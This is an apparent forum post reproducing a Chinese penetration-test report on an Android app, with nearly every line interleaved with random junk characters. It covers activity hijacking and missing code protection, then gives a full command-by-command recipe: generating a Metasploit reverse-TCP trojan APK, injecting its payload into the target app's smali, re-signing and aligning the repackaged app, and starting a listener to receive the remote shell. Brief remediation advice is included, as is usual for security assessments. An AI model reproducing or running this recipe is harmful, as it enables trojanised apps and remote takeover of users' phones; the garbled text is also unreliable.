0 g% L7 b4 p4 X, N) ?( W. ?" C' t$ ]1 I( V9 p4 }

, S, R/ m y4 Y, A1 } - T3 d8 H u) o% {6 u   & k( h- R% Y7 Y; u4 e+ V1 v2 H, a) U |, v' p N6 I, ` d

: i( S$ T! X1 y 9 k6 C% m3 e' f( J5 v, A3 L1 W

, j$ d, \& o+ I; ?/ F; o7 s , U: X3 n5 d: x, { 1-2 测试结果 " g, c: _8 W8 x- n# R" X) ] & {* {. W4 M: f: F. D% ^( [

/ y; F$ O |6 z& P% p , S5 o/ I0 F$ D6 e. X

5 ?/ E9 s" k! J4 f 6 J' i+ L7 c) ^+ w! m' I: \2 S5 p6 }+ I   + Y `- U9 U* G4 l" J: H& R O " s& |8 e: z9 G% H3 N& q( `6 P

# T- Y% \$ ]& }1 G f : n e, d, h) t. C5 P6 @. S8 ^

9 g2 j: G m4 T l: z; v: K( s! U' y7 X$ N" m 2 检测结果                    0 [0 U$ h) M, I' ^ A5 z 9 }4 Y; O1 c- q

' n8 J3 V) M2 {8 _/ k/ x: i . p- s+ f3 I" j3 n6 e% W

4 e$ \& V) [0 e3 |% @" H) O: `8 {$ n: ?, Y7 [ 2.1 某某某 & ~1 c& o0 |' M0 W9 X$ ]' |6 k7 G9 l8 r/ T! Z8 u

2 O& K0 w% C5 k2 ^$ X- R9 G8 S; @ `# H9 r5 s7 `. A- Q, \2 x, T

) ^+ g+ l4 D/ [2 X- F7 i7 h- ^ 8 N* @! @1 L9 x& T 2.1.1检测目标 5 ?/ ^& G+ N9 y ?+ u% l5 a" k, x. `) C ( E. Z5 u+ u% ]& c/ t) ?

+ W! x: A* f; E) w% s# U* n1 Q- ] ; L& i$ i2 Z- f9 y- q8 ?

4 {7 N% Y7 K/ S ) R9 I+ t9 J. O& i 目标地址: 某某某某某某APP ( l% L2 C( t' r5 N* O 8 U/ S; m' a. u5 D" b

8 w. z( i+ z$ q" S/ v0 v. t 3 X) Q0 G2 j! `$ s9 v5 N$ k0 B

% P3 F- z. c D + r; p `6 R, o; C 2.1.2检测结果 ( j& @8 O/ H' ^0 }( d ! v0 o; a6 ^# y' ^ m

" J0 L& b2 ]4 V. e1 f# Q" |% e4 e 0 p* ~4 ^9 ?. u; t! U. T- r2 M

4 ~0 t& W+ _- X + X7 b: Q1 C) J) x# R* U 2.1.2.1 7 f- H5 k8 Z* i3 `! ?" G" M , o6 }( g9 O( G6 Q! w

9 P4 _& J9 M' ?" j0 b9 n/ ~ & C) M( {- u8 |! H+ X5 Z

9 |2 [5 v# q/ a& m 8 |& _* t C: s/ Z7 L 漏洞链接地址:某某某某某某APP 6 a, N# ? p) d2 a! _: r/ g# G0 A5 q# {. t' D# Q) m) Q; j

5 j' D* u7 U0 \) V9 v 2 n' c5 A( Q' z2 _' K9 _2 F1 ?

! A& y4 w. X! b) i/ B 6 _! H) [2 U$ {7 a   3 S7 I G: w# D' o9 c; u4 r3 C7 H! v5 J! a" v4 k( \

: `6 x2 f* H |. D% V! j" t3 L0 Y/ ]. x B) y

2 E( F( l0 P) f; e& P 8 l. }( j2 ~3 I8 U4 c) Y' M 漏洞分析及取证: 8 P' D- o1 h+ t6 M ; p' O" s6 \( }

u: h# ?' `, D0 N% U& j 7 E/ _9 @3 h0 F( e! F

3 s1 b4 ]' [5 Y6 U3 Q" z# f4 n 7 v+ \, _9 ?$ ]3 \9 f2 A                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: " ]2 t/ V$ s3 Q7 d! B% X3 ]7 i* Y! {+ _/ ?) G" ?

) v( M) @) L: v3 t' ^. s" P+ Q/ U8 R4 ]4 r4 ]' C

+ q \9 l+ n, i6 m " e9 d0 m2 P) N* F      + z7 \+ J8 m3 H f: a 1 z% t8 h+ g' w/ v9 H; J

. [& j0 o" V+ V) R5 e 1 i3 r! Y/ M, p- O3 r, L7 e$ S/ @* ?

- d) o9 P) o# k1 O5 C7 a# T* W ( j* D( M* a) ~* Q' I# M                       , X* F" P! {5 c, {+ w% B1 P2 t, H E, P! `% [

2 L$ V/ p/ g2 e' E 0 R3 i: [4 x/ }; a$ i7 H

- \ O3 Z6 Y- Z- G$ O8 q2 T / x: d# X, p2 U! ~3 o5 R8 e 2 O% `' \6 _$ s5 L3 B) B2 f/ j E! @& c2 N- J: Z: t) o

+ n6 }6 x- e$ j: t+ F, q / E% P5 q9 q9 w9 J8 V3 J$ h, z3 X

0 d7 [6 O0 t; t4 |9 w5 U6 B1 \. {9 A2 D6 C 6 O R, L# M* J- x3 u) x , T9 o! h4 I, f

; U" `& w0 A" b* U . ]7 D* T5 t) d( z" _) `

! f8 D% U# x0 u( X+ _ + j8 r( A! O3 I9 ?$ f R 2 k: n3 X7 B7 O9 P/ F5 e 5 @ _) T! |! W" y1 t1 [- \

7 v$ E) E) n, H$ A! }0 Z0 D- r $ h( ~. E" P; e8 S3 b& S

+ D$ d9 k; H) u9 j( G ) r6 v5 t& O, L' g5 | 漏洞危害:高 3 |" U% U$ ]" F" l + e4 ?* x& T! r6 f& t( |

! E( J2 n* C. [- Z3 e' v+ { ! z1 e9 L2 X9 H
; L4 F+ ]3 k' [6 Y7 { ! c: Y8 \& Y# I! p ) w- a* T+ C& `9 n; o( f) _9 t3 i) B7 U( G5 F" j% j9 {2 K- K+ L% [+ Z5 W7 v* [" _0 L; K- e" z9 B) H* t+ U% j% m1 e7 p& g. e3 F5 c7 L! E4 \( h V( D. b: ~4 M6 B. k/ k8 S- C6 e2 K/ {6 u m0 G% J( d& o* o- J3 O& c8 a8 g. l5 V" Y; y1 T0 e: ?% E, ]% m1 q: h' M8 U! t: P _* h4 w; h( n' H5 W" j0 O, q P8 |5 h+ d7 J s% \8 i6 r) H3 S1 X& z4 F3 P7 Y- T7 V, ~% b! j+ K' L$ W/ k' Q3 }6 j$ s" w6 y+ }7 x4 {; p! U8 [) u C' }& \; ~$ K- O: d V; V( T- Q1 b- f* T* R/ z- g( d- @0 p2 l& }) U" T. _( q7 M. c- x$ w8 _# _$ k/ F6 ?$ l1 r& E g5 V3 ]/ N/ }6 f! O7 J+ ~1 d* I" B7 f9 E6 [( {: j5 ~( y7 l! @* A% w" _1 k; h4 K1 T
+ V8 i3 k; W+ X: \ . E, H& {& U$ ]& |) t* G4 }+ V- Q

( g$ a4 @, t& H 0 z( h" V8 F, K5 o* E: Q 严重程度 + o6 Q3 ]" c, u [( R ) X/ N. W$ Z7 a6 n

% a: D# g; L* {& n/ U4 _ # p. f4 P! J" W0 x& x% [9 U 		- ]: N) {. a/ ^0 y. j4 j 5 ^3 [0 m9 ?% K( u6 U

, C4 P$ Q6 l$ z7 j: l! ?: Q0 c9 ~! k/ M! E ' i0 {- K; V' P# C+ J 6 V5 [( `1 j; I) N

& |0 R( p; Z! A3 E7 k) g 5 ?* w3 z0 b6 ]( x$ P1 i2 A7 o 		4 c) W8 f" y2 I& R" f& Y- v: N/ n, z) M: S" c

) ]$ N9 w1 M. b/ t' q + d1 k q+ C9 l B& ?( v3 W s1 }4 u5 {, q7 H; {0 ? $ K3 {$ q8 _' F. k- K' c8 R

2 X/ w j5 [+ V+ Z' }2 d0 u+ a7 A4 U, I% O2 C2 i( r 		! f6 U5 R; a7 R/ |2 k* b% ~4 W , y Q8 ?4 C9 s, \1 q/ d& I

8 w! @" q) z% O% \5 f Q7 I- ?9 n4 _ J4 H# I 8 m4 C; m4 \0 w. k8 ? 0 \7 d3 i3 s: I2 i+ W7 u

& l- n' B5 @( R8 r& I" W1 i+ B M) c0 o! { 		4 l% M( I. P6 s( L; i ! y" K/ D. G5 k S

- t. m; k$ f% Y/ M ! ]# _. T; ]- d* X4 Y   / x8 o) u: f% L# o8 N 0 O+ [' Y+ T! j7 {7 l

' T) f3 s* p% a ) F! y- w5 x2 x8 G 		! z4 f1 _. \% G# q5 B( A2 h# m

2 H) i' ? e" i3 b2 D - r# g6 U; K! @1 r" |1 [4 W 1 l2 G' ^+ F, k; S0 o8 b / d, P" F7 ~" l1 W% F

; V. p" s2 y% A" U5 j0 f % V1 t! M( A2 j& p5 V; T ~$ R 		4 X3 A" S: a, _0 Y/ T: T4 H- R5 P( h- {% O7 U

5 {9 j2 a% ~4 j0 _1 ~! J) R7 K3 r / C& A0 W' L' f   , U. ?! n2 d- b$ t I s7 I% b( i: Q% s# j! `/ f

3 I: }1 @5 }6 o- W2 u& ]' ]6 B) j# B, B* x7 `% X2 n
* e n: s( X4 v/ c( b7 p: R " Z. I" ~- w5 T" |. N. ~$ L- b9 `
! r' ~- a5 Y6 Y7 k8 _2 A/ d1 s7 c9 ~: V; P' n. c

5 I# X6 ~9 L2 k! Z 2 C1 T' \2 b9 ?   7 ~/ X/ s& E3 P" K" C 5 a# L! C' I0 d( B' U. D

# ~) U4 t3 [0 M* I' K5 C1 x9 J 5 o4 N8 ^% C* A }

) z' ~' V( j* y: j ; |* {; u6 _# M% q 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ; y; @! p7 L" b i! K# Y: {: u9 N0 O7 T6 h8 b7 }( [$ z

1 P) X1 p1 d& V9 \& X% e* l$ ]7 X5 e @

& x" {6 s: a6 ?; U D. l r; _$ d C, S( e' C: G, g           - r7 c1 c1 |6 o; m2 F& b/ G5 ` / W/ i. K5 |$ G' i' @& z

" O' r& L( E7 [! f2 R) F & p2 A0 _: O+ W7 J

* B" s+ d2 V. J" O/ _: m( V! x o8 W1 |6 H   4 P; ?- a/ t/ o" T. v/ g 7 S! B* [0 O; _: h. t

. X9 [/ D/ Z4 G. g: p4 ?* O9 s$ w0 ?" {- b |& Z4 w+ `3 k( ~- P

9 X6 r9 _( d+ z5 X2 Q* V" \ + e# ^) d1 q; T) S; u 2.1.2.2 # G+ N. U5 V. j( H% P; R$ Q4 X7 ?2 R4 d2 K) h# I

1 f' m% G7 h1 y8 u# ?0 @. q" q) X2 ?2 w; f" N% Y/ b% n) {% F9 P

; w( e& S v4 n0 ?* h ; o8 }: ~5 @% @4 q7 O 漏洞链接地址:某某某某某某APP . ]+ S# C! u! o) D4 B ~' i3 n& R) c" ~ z" Z8 ?

, `) m: y* F7 w! c+ L8 a9 L1 X 8 X. {5 l! p) M( s

( ~( S J+ `3 W4 L7 j: u / _. {5 m& c0 Q& I 漏洞分析及取证: % [3 N6 j; X' M' y5 }' K+ r 2 F: e" |% R1 e

# ~, `' u+ M0 o) j 9 z: \' S4 f; l1 S

) S( f$ a6 ^& X% W+ ^2 n' g: h : F! {* g0 X) {+ O# r m                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: # ^5 a# T9 g1 w( |9 W: a + F* X- ~' K0 m4 |

/ f/ S( ~( W- j" \$ U" u, V' x+ Z* U# `

5 Z: U' a1 c- z8 o: g. I& c 4 U* k3 ? Z% `# y, l/ U Metasploit 生成木马 apk 0 u2 u8 v# |4 R; r* h6 W) |( Y$ s$ a 4 z+ ?; t. F4 ?, m

0 ^1 B3 Y+ ^( \9 o' n ! [: e, d1 c/ c" @5 {/ F

' c% a F0 }0 J- J9 X 0 e* v; U7 @5 [3 s9 M msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 3 ?3 ~! ~( Z% J / N' k) s" E1 ]: I/ u* @7 E7 F

' u+ _ G# K% t. R+ V' h2 k2 V 3 J. D9 t. c% Y9 c% J8 I

- S& B, ~8 |3 ]& Q! ~2 S" } & M6 C1 o' P, e- }) {/ d. ~7 J 反编译目标apk和木马apk * B" }( y% [/ k8 e! r( s; k 9 b. O& N% {+ C2 k# }" J

( {3 O. K/ X6 j! U8 Z! E 4 O2 d- V" C+ H- n

0 R; A4 [) n1 _& `1 x! G; t) } / V4 ?$ Y9 ?' t apktool d target.apk
. o3 g( m7 |! v0 r! a, ?& T+ H: _* v7 k apktool d cockhorse.apk % T# z2 p6 J" V# _ ! x. z9 @: b1 ^; w' d6 ?6 w6 f

, I! Q! p# m/ \5 K9 G0 k' o; q3 p ' |# s* R9 P6 | [4 @

3 [$ d. M( o( V5 Q , R: \0 L) Z1 ^0 |# Y 木马 apk 注入目标 apk % {0 e6 ^2 `0 l$ K5 C' ]& ^% |# _. \/ b( D) _8 w& j2 P

2 o3 ]( w1 E3 G3 s : i. i/ u. g# F% J. v

0 ]( `' P' ?% C9 i" G4 d5 l: q! D. H2 C# u) V, s9 k 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
0 n& @3 N4 ?6 E% S : T i" r5 S S/ _: C4 X9 G" X2 n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 0 ^1 S2 W! v) Q* J% `1 f - F# |, X) [9 m& |3 Y6 O

3 W% H3 V& L* b T8 N# J5 N 2 K0 F+ i! U a* t7 X6 l2 J+ Z

% A# V0 l2 s/ m4 n) M; g4 l" r1 H 2 P! H, ?6 ~7 @7 h- K3 z6 V 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 . Y, o7 M4 m0 L. s. K! p; A- A o* T. H- I x( c( \

4 j# K9 l# _( f/ i8 Z& J : l( P% }( i) G0 F6 c

% p) G& _3 I+ q7 d! Q t! h7 ~9 C- l 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ ' {) [" ?9 h( F+ n! |" r: F a! V; J4 K9 }

9 b" M& C+ S9 C' Z # |! B' {- L* c9 m4 q; ]- B; z2 J

G0 A4 M" r F8 x 3 \) X# I. S5 o/ e. ?. S 回编译生成最终 apk 6 w# C% y2 {" |5 N( ~ C E6 @- P7 e! R/ ~2 G

" x( {1 p# C9 n/ A. H) l7 \ & T! c4 b% y/ s8 S- T' R

; q8 u6 j Q" b 1 p/ F2 r& `' I- P/ V/ I% K 重新打包 - {( {6 z: H& B5 K4 z- |. ^$ V6 l # V/ o3 c5 S/ |

/ G% }: o3 c" P, G0 R$ m, y( {& k $ g$ @* _' |8 e2 }# [1 Q

$ y" U# a$ ?8 F' ?( E 7 @7 H% k- Y$ [# `) O apktool b -o repackage.apk target_app_floder ) E! V" |7 ^, p: | . K$ ~7 p/ o' ]$ H h% N2 K& b

: S$ X; H) ?& L8 U+ K' E0 k( O7 e9 |4 v1 W( P' K# Z4 K3 p

3 C; v! M a. u$ \, K " T" y( }8 K7 b) q1 }2 _ 创建签名文件,有的话可忽略此步骤 ; R8 Y' w7 e# J5 s * X% S3 m# V4 c! W1 p# c5 P

4 ? U- E! A. u( N3 |0 Z$ ] % t4 g& ^5 i' r/ ]

5 k" P/ F9 ]) Y3 T: Q- v ) N" r7 Y! o& ]$ ~; o keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                - q# {* Y: M/ b0 S+ m ; K. l2 D# {2 b5 Y/ ]! j

7 o: X* t+ J9 k1 F8 @ " W0 J" f1 f) E" C- R

6 a: C `/ p: V" q" d - x( L( f/ N- g# s 签名,以下任选其一 ( _% S' k0 B( K: G5 ] * n' t" @1 w7 e3 {' Q7 N( r

3 U% Z& g1 k: }0 ]% Q$ U# S4 i2 P1 L1 p2 I

" \2 Z9 B* K$ K5 Q# b 4 e4 u. j- N+ T4 d5 z. f/ z% Y jarsigner 方式 / C# z, S, X4 T( _2 d , P _$ X# {, I7 x" d G: l. d2 U

/ p1 ]3 E1 u( _* o+ N' t6 o2 X5 v9 H. ~: V# ?, F* Z- s

' e& O2 ` m4 q1 f( Z1 G - o5 ~: t- h( {8 H- k jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ) {, R+ Q& w" B0 ~# [9 E6 u0 M1 _ 9 f$ i) V( w l3 \' G3 B# W1 k) x

7 Y, a9 ~ C& R) a- K8 [* B& N+ G) G! U7 S

4 X8 B7 {1 h7 c/ @9 J& a# h2 V1 [# b4 j: U apksigner 方式 ) i! X4 ]8 Y- j( H + x: w! W: K0 o# i+ m1 y6 m2 k

! X7 }& @) R* t3 s5 w. Z - F5 L; g! _) a* N6 l$ d% D5 {. E; z( X

0 o/ A! `, P- ] / b z& j* W7 ~0 s+ M apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 3 O& \, E% t# Y& ?3 e1 J5 j% E! u: l2 E 6 G: T. e6 F& G, t3 v; j. T; {

/ k$ v7 Y' I. w: k- T1 h7 T 3 [$ v8 }. O0 ]1 Q

9 c$ j& e: u% b' o1 V# y 3 _" q! q% x2 t( f$ ~) q 如需要禁用 v2签名 添加选项--v2-signing-enabled false # h9 a. C5 E; a+ b# J3 k: I& [$ J" n% y

: ]4 Q; N: e0 H / z: m2 T$ j6 r4 c

( E: ?0 j. k& ~% h3 ?! X + e) N$ g6 N4 d6 B e 验证,以下任选其一 / N+ O7 ^; ~( O5 K 6 C6 \( _5 D0 I, o0 P$ G

' f( k' s+ t) A, L4 d & ]* _! S9 S" b) ^- T

6 j' ?3 K+ k ?3 R8 S5 Q 1 _$ _. R1 \7 N& i- d1 m) A jarsigner方式 0 e& Q5 |# @1 d/ L% X- S6 E- V: n, @$ X

# {. _! C& U4 g$ q) w! ^5 w 2 U6 M. [: w: E h2 }! ]8 i& p3 ~

' E% ~$ F5 c7 }/ ?& J4 @ 4 y7 J( }2 f5 A% g jarsigner -verify repackaged.apk 9 [" I. i* G! ?7 Z # i9 C% ~# C6 s. N* X9 k

0 {6 M+ v$ B4 x+ _3 N: }: F$ H/ o 8 u y, t. X$ j0 T5 T! S6 }

& E o( s$ P* P3 a+ l) i2 N ) |6 h6 h1 g# n2 A% E$ E apksigner 方式 ! f+ {( g2 ]) e) \4 G9 o `) s8 ] , A4 l3 Z4 J8 p

1 ^* e3 a6 ^1 w! g3 w, @: F6 m, m4 J8 O, B+ K

. I3 z* J2 X; ]: f0 q 4 v4 s; I6 P1 s. E9 _- R! I0 X apksigner verify -v --print-certs repackaged.apk : D! c& r7 w, \ ?0 ^8 C2 {7 H. J& F! q C( t6 N

2 G. `) J4 @1 D" ?% ^7 S7 B 9 j( K: G5 g3 T) W1 j5 U

, I) Z' e5 N% o# [8 ~& D: ~ ' C$ g, b1 y5 Z keytool方式 ) g- ~# v$ I1 Y$ o m! M; o5 Z' ?+ {1 C

6 g+ a6 A& \4 a6 ^ i# ] ( _9 w4 N# O) q% K E& X4 q

$ I/ d2 v$ |# j& [: B+ f5 G- X' N! x, E# G' C keytool -printcert -jarfile repackaged.apk # b" t4 e$ K& ~ Q" `9 n 5 W7 y4 a" W& }" \0 W

( e# F; c+ Z% r8 Y6 I% X+ N0 Z - H l4 G' w" u4 \0 i: B/ J

7 n |/ C+ w; T( t! |1 Z% f 9 U0 m, u7 x; ]7 \" m5 U9 ?8 G 对齐 4 E* z Q6 y$ B$ h0 | 7 x- V* v" Q: O, |3 a4 Y

5 b, } Y* O: ]2 w7 z, \ 4 D3 j: d6 m) G: ?" b9 k

. B. G2 G' z. Q, }- h- D( n - V2 D# Z8 h- V* U$ x- u4 G 字节对齐优化 $ I# J% U# ]/ F F( G5 Y& h 7 M% R7 Z3 I2 p; \: G! G

7 p: E7 {$ D% V$ w8 t( t3 p/ M . u8 \3 d/ E/ u0 Z1 v& l. N

" |/ ~+ _8 u3 j8 T% V $ K9 L2 S* g6 z. q) k zipalign -v 4 repackaged.apk final.apk 7 q) ~( d, }3 Z1 x7 C " A6 e8 M7 G1 r# n' ~% x6 J; O

! m' e$ O L& ?* Z3 ] ^* o- i- ~2 y1 g

7 N9 Z5 O% u) | ( X" l* O% R9 [8 T6 B g" { 检查是否对齐 # }3 g \1 Z/ m5 G ' Y; B, [6 H1 [& ^8 @7 I

1 l( ~, h! A6 J, _+ ]$ X& Y/ O0 F1 V: k. J: J

$ n o) ]+ y* B+ H/ b ; p* I4 o8 Z; h zipalign -c -v 4 final.apk + b9 d' b$ Y' Z& U3 I1 `, p7 c/ e' ^ 7 O7 ?* B) A- c

( }' K. H) v1 O+ f$ ?8 J . w0 Y' E1 Q' Z. _; t9 w- I p; }

6 M0 J7 _- \$ N0 j, _ 5 k+ i+ Y0 P z# q 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 + d6 J+ c* f b: o8 Z0 ], z1 H ; \* u# i Q3 H

' r, k# M1 a( Q X* }! h; b, y& f8 _$ z% a5 [! Q% X3 q! ~& O# K

1 O" u6 a. l& D, W + Z, d+ D; n" r! k, I: j( E9 A 启动Metasploit控制台,配置参数等待上线 3 {( r6 g/ e# j4 Z1 l0 O ; P* L; Z9 U: U* L" \! A1 ]3 Y

, I5 N$ S* f3 u& M6 T2 v0 s$ m ; n' a$ b# Z9 |4 m* ~* o9 w5 y, H( g

7 Z3 Y. x2 V2 G & f$ {" a e+ f8 F 在终端依次输入如下命令 2 D# z9 o- z" m5 ?* K8 Z4 C 5 h* q& q# I8 h- w4 G: m

$ r6 V: a3 |& Z; W 6 t, Q x1 T8 z( Q5 R

3 g9 h1 `! Z( a y5 j2 y- Y8 N4 O( p- [6 }9 E: M msfconsole ' g4 l$ }1 n% A" u( V! s7 t- I # s/ n3 J7 X% U1 m2 {4 Q* y

, S0 x% v0 _9 S% \% L" Z 2 I! m4 {1 M$ y3 z- M! M

7 n. ?+ R e( E# `" L4 @# z, q 0 I; E2 S) d I s6 v use exploit/multi/handler : h. h, |: r3 i3 Z# }3 }( K" p1 b6 t, G* |+ A* o

& L, {3 \! B( f * {5 f! ?" }3 h% i9 C7 j

' t2 s* k$ B3 j$ G5 g$ [ 7 |; |! \- o# j1 o$ H: b set PAYLOAD android/meterpreter/reverse_tcp : J% H7 U) H5 ~' T 6 ~ G& _4 o* W0 O

+ V! Q4 d3 [8 L' M* i6 V + S) U; F( w; s4 r* y% w1 c

- }. T) u6 G. D& k. ~6 E/ Y- ~6 N set LHOST 192.xxx.xx.xx 7 |$ R6 `" L* F0 ? 4 `) C6 R3 ?3 X3 z- F

, j4 I1 S4 x9 B * r, p9 `/ C3 v; L6 K

0 `% G0 y% ]/ g0 ^% u - F$ ~4 v- [: T! o2 d set LPORT 4444 . p' T7 C, A6 `! Q* q8 L , S9 @! A$ Q" f2 s

7 d/ V: F: H8 V+ m2 `6 I; b9 H k |' G# ?( ^: j3 F! E7 B& y

+ w/ ]- J2 j; M% o4 D" }* ^- ` 7 h9 D/ t, e$ o- Z1 `. H: ~) N exploit 1 c0 f6 C/ R5 I6 T+ }* g 9 o+ e, n" p9 [6 q1 s+ s( Y

3 s/ O# A1 z& Y- O# s* B 3 w3 x( R1 A9 x! }3 D

. N4 J. q& f# }7 N2 A 9 J7 x! x& M1 R: I. J 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               1 c/ ~- n' Z' f& u1 ?: ^, G' \3 x" x) K! s' i9 c9 ~+ D7 Y

% G( ]; l' y( F% a. R : N8 x' `4 T' ]! \% }3 P, d4 b6 e

% m( p- z" y3 a6 v% R2 ]' `! {% w1 E 漏洞危害:中 ( }. ` P! T. Y$ c1 X- S8 D! E3 V: r4 S) m E3 x

$ ?6 N7 B3 _8 j$ t# w( x- _& ^ . R9 V; h- y0 |0 Y/ e
0 x* z; G( z/ z5 l3 j ; B2 q, W* \( A' U 1 @& W7 ?% E, q9 s8 S% J 2 Q1 I5 A4 Y; B. ?+ f# e 3 e# d9 N1 F% Z3 Z: R0 u4 L+ R' }: P$ l+ x/ ^ i! G8 K" K% I+ p7 T9 y9 C9 U6 m! W. s) `3 [7 h* H. K) c( L' k" P& p4 g* w) r0 o( v' P+ k1 N7 Z6 t/ c; N: d8 |' @9 M* S" O6 G Y H3 v0 y; E7 L- T4 k: P3 K" ^% r6 j! o$ }+ r4 d# N5 W0 `' h7 ^" e3 U+ j* l- N% i& W1 }+ u9 Y! n9 D; S& w R: d* Q* {; E# y; ]5 E( ]4 Q2 l* J6 C: x0 q f9 a' Q. x1 I# \% Q7 m! A' ~3 o+ q9 A3 C& Q; M: E* V: F9 V4 S- ` _3 N5 x7 ] W# n2 ^) c8 Z9 S2 C1 N' C7 K0 l6 \ ?8 z8 _' r, s3 G. B% g8 c! y$ A/ u& c8 r- ^5 a7 X$ f# G. X4 q3 r0 M6 f9 X& q3 b- A: ?/ n0 u5 [7 K# ?; I) p9 x( V# h# x
8 |: S! |0 Y. O( ^3 y! ]: [ , W4 }+ K& O. `

, G5 J+ d P) N2 U) m6 h' O/ f 0 T9 I+ s) V% ^: R2 {* @ 严重程度 6 t- O$ `5 }( W+ m 2 e3 [4 @1 z3 B, e

' m1 N- D1 i( u% r" e- |1 \5 E r% ~/ B! E) j. m; F% v 		$ t$ O- n/ B* w4 m: y1 r8 {( ?( h, y& g( g7 t" r' T6 H: F) V/ k. z

. F; p9 o+ ^' @, m" r7 @ " B: A8 W( z7 R3 G9 a' c s% y1 c/ i3 Y 5 Z6 j6 J1 X5 @ W 6 ^) m% b' p- |+ ?: ?6 j

4 K$ c; I; i8 T1 P0 R* I5 K - a% t/ W7 a/ V! Z 		+ P+ A% F9 b5 l3 [; y 8 d$ c ~5 f2 @$ [

2 j8 N/ p. R. V b2 |" O5 P* a ( Y z* G( G9 b% } : j* X. I9 R/ `4 }7 |! w1 m F) |: S) H! _6 Q \3 m& p

+ I6 t( p5 e( ]* T% P$ j7 Q3 a1 P; w8 M 		6 W7 I0 W: }8 ]4 Z- Y+ s1 ? H3 H. J; U1 }$ c( g

/ O' r% t9 Z; I , B2 E. v& U4 \ 0 D& N. R' ^, n6 I0 z" o: h5 F 7 ~* F& F0 H. [9 ]) H; V- m

: n1 a1 K8 M1 U+ I& S8 ~* d% @) q/ m q9 K ; _7 ^$ k/ Q! B0 V% E5 T' Y0 h 		+ e8 h/ G9 S( r0 q+ o0 y+ d6 P9 Q3 M- w/ {' `7 c& h 8 p, O5 g1 j$ }6 b2 K' @1 X6 ^& n$ t6 G% I' M* _) o& j5 Q

5 G" H) o2 Q* G 8 {) ~$ A$ Y, N; ^2 H8 N5 Y5 G) c   / T9 l* L1 e6 F' W1 {: d . z! `# Y5 F! k* g X1 n

7 T. g) b9 ?6 T7 y: k/ M* }" _8 e6 Q 		: F: r* u% K/ z, E ' O: ~8 t4 L; o3 \* p( ]4 S7 W& }

9 N$ u! W" _0 Q4 \, f 4 t. v& I3 d: O7 W$ r$ Y( u 1 e) z' y4 Q5 }$ E/ f& H 1 Q+ E. S6 n- c8 u! \1 L+ M

1 s* \6 L0 k- R! v7 P" y2 u* f " a4 P! M7 D6 H+ u 		9 \! y3 D( a. w% X, ^6 P # I0 F: K0 d, c& l' F# P2 t' n 1 I: N2 o9 L, R1 l m& J % [- V9 |9 P& p% i. v

# D+ e" N/ p$ D3 @) f . ?7 U" Z$ b% C& w   + A% H7 h" T5 V5 f 8 d z, r5 \! D4 @) u

3 @9 u7 u4 l1 k8 f" t( g 1 c$ Y$ o! o7 v, ]8 j p' n$ z
2 k3 [0 _# c; T/ k : }# D+ p x% V+ J. K. Q
6 V% K: u! K0 D$ j. s+ A) \1 `) L7 r2 ~) C: j

8 l& Q, Z) W8 D3 y, I! m1 v ; _+ x9 C% ?8 S; N5 [' C! ?   0 a) \ e3 ?, T9 D: h/ s) W' W! J8 G4 n. p. L

, j! w7 t" w4 E4 j+ h) ]9 e' d3 m6 B; y

& }* U, j: p! M I) L& ^ 1 z. ^' X: k' j+ { 修复方法: - k7 X& ~% r" j 3 `' g( x, R& P6 U

: l6 F1 m: k* N' R) H* D3 ? $ S" _. G; t; g* o6 l% }

- i5 Z* n6 [: P0 z ) r, l2 d, U$ ~8 j' u7 d               1. APP 启动时应做签名校验防止二次打包。
' z; G+ P2 ?5 B* Q7 W- C- v0 r' k4 \ % z J5 x/ {' x- W 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 : ^9 _7 f. m+ O. _# b! G 7 m ]* T) a0 P' _" M; o# o( b

& w* f8 n- O' y ]9 ~, R ) M0 I' z: L; z; B" x1 ? , Y, |$ B. v, q6 d+ a7 o2 _ / D" g5 o1 }% Q+ V+ K9 ?$ V

6 a) f+ U9 A3 F. b( B( V) g ` m6 X' g; M _* i0 ^+ Z   & j+ _3 N0 H# _8 f2 r8 s! g8 J- t6 r6 h+ }

& z2 k4 g. c( K1 I) |6 u# V+ x$ Z 7 m" p' [. W# ^( g& B, L- u" `6 n 7 K4 P9 }7 z8 Q0 P ( K' T, R/ p1 ?$ q" l: f; {

2 d4 p) r k0 S 7 q( b# O/ u( J3 ]# V
2 B5 H8 Q( S5 I2 R % `. I9 R1 j+ V

4 E4 C5 B! {- T9 t % N* M1 b% J. u
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表